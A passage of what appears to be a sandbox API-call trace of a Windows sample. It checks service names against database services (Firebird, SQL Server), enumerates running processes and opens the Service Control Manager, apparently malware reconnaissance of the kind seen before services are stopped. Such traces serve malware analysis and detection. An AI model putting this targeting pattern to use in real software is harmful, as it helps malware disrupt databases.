lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0185.177] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0185.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0185.177] lstrlenW (lpString="NgcSvc") returned 6 [0185.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0185.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0185.177] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0185.177] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0185.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0185.177] lstrlenW (lpString="NlaSvc") returned 6 [0185.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0185.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0185.177] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0185.177] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0185.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0185.177] lstrlenW (lpString="nsi") returned 3 [0185.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0185.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0185.177] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0185.177] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0185.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0185.178] lstrlenW (lpString="PcaSvc") returned 6 [0185.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0185.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0185.178] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0185.178] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0185.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0185.178] lstrlenW (lpString="PlugPlay") returned 8 [0185.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0185.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0185.178] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0185.178] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0185.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0185.178] lstrlenW (lpString="Power") returned 5 [0185.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0185.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0185.178] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0185.178] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0185.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0185.178] lstrlenW (lpString="ProfSvc") returned 7 [0185.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0185.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0185.178] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0185.178] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0185.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0185.178] lstrlenW (lpString="RpcEptMapper") returned 12 [0185.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.179] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0185.179] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0185.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0185.179] lstrlenW (lpString="RpcSs") returned 5 [0185.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0185.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0185.179] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0185.179] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0185.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0185.179] lstrlenW (lpString="SamSs") returned 5 [0185.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0185.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0185.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0185.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0185.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0185.179] lstrlenW (lpString="Schedule") returned 8 [0185.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0185.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0185.179] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0185.179] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0185.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0185.179] lstrlenW (lpString="SecurityHealthService") returned 21 [0185.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.193] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0185.193] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0185.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0185.193] lstrlenW (lpString="SENS") returned 4 [0185.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0185.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0185.193] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0185.193] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0185.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0185.194] lstrlenW (lpString="ShellHWDetection") returned 16 [0185.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.194] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0185.194] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0185.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0185.194] lstrlenW (lpString="Spooler") returned 7 [0185.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0185.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0185.194] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0185.194] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0185.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0185.194] lstrlenW (lpString="StateRepository") returned 15 [0185.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0185.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0185.194] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0185.194] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0185.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0185.194] lstrlenW (lpString="SysMain") returned 7 [0185.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0185.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0185.194] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0185.194] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0185.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0185.194] lstrlenW (lpString="SystemEventsBroker") returned 18 [0185.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0185.194] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0185.194] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0185.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0185.195] lstrlenW (lpString="Themes") returned 6 [0185.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0185.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0185.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0185.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0185.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0185.195] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0185.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0185.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0185.195] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0185.195] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0185.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x772a00 | out: hHeap=0x680000) returned 1 [0185.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x370 [0185.199] Process32FirstW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.200] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.200] lstrlenW (lpString="System") returned 6 [0185.200] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.201] lstrlenW (lpString="smss.exe") returned 8 [0185.201] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.202] lstrlenW (lpString="csrss.exe") returned 9 [0185.202] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.203] lstrlenW (lpString="wininit.exe") returned 11 [0185.203] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.204] lstrlenW (lpString="csrss.exe") returned 9 [0185.204] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.204] lstrlenW (lpString="winlogon.exe") returned 12 [0185.205] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.205] lstrlenW (lpString="services.exe") returned 12 [0185.205] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.206] lstrlenW (lpString="lsass.exe") returned 9 [0185.206] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.207] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.207] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0185.208] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0185.208] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.209] lstrlenW (lpString="svchost.exe") returned 11 [0185.209] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.209] lstrlenW (lpString="svchost.exe") returned 11 [0185.209] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.210] lstrlenW (lpString="dwm.exe") returned 7 [0185.210] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.212] lstrlenW (lpString="svchost.exe") returned 11 [0185.212] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.212] lstrlenW (lpString="svchost.exe") returned 11 [0185.212] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.213] lstrlenW (lpString="svchost.exe") returned 11 [0185.213] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.214] lstrlenW (lpString="svchost.exe") returned 11 [0185.214] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.215] lstrlenW (lpString="svchost.exe") returned 11 [0185.215] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.216] lstrlenW (lpString="svchost.exe") returned 11 [0185.216] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.217] lstrlenW (lpString="svchost.exe") returned 11 [0185.217] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.217] lstrlenW (lpString="svchost.exe") returned 11 [0185.217] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.218] lstrlenW (lpString="svchost.exe") returned 11 [0185.218] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.219] lstrlenW (lpString="svchost.exe") returned 11 [0185.219] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.220] lstrlenW (lpString="spoolsv.exe") returned 11 [0185.220] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.221] lstrlenW (lpString="svchost.exe") returned 11 [0185.221] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.221] lstrlenW (lpString="audiodg.exe") returned 11 [0185.221] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0185.222] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0185.222] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0185.223] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0185.223] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0185.224] lstrlenW (lpString="Memory Compression") returned 18 [0185.224] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0185.225] lstrlenW (lpString="sihost.exe") returned 10 [0185.225] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.226] lstrlenW (lpString="svchost.exe") returned 11 [0185.226] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0185.408] lstrlenW (lpString="msoia.exe") returned 9 [0185.408] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0185.409] lstrlenW (lpString="taskhostw.exe") returned 13 [0185.409] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.410] lstrlenW (lpString="explorer.exe") returned 12 [0185.410] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0185.411] lstrlenW (lpString="SearchUI.exe") returned 12 [0185.411] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0185.412] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0185.412] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0185.412] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0185.412] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.413] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0185.413] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0185.414] lstrlenW (lpString="hgaibc.exe") returned 10 [0185.415] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0185.416] lstrlenW (lpString="cmd.exe") returned 7 [0185.416] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0185.416] lstrlenW (lpString="conhost.exe") returned 11 [0185.416] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0185.417] lstrlenW (lpString="cmd.exe") returned 7 [0185.417] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0185.418] lstrlenW (lpString="conhost.exe") returned 11 [0185.418] Process32NextW (in: hSnapshot=0x370, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0185.419] CloseHandle (hObject=0x370) returned 1 [0185.419] Sleep (dwMilliseconds=0x1f4) [0185.958] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee08 [0185.958] 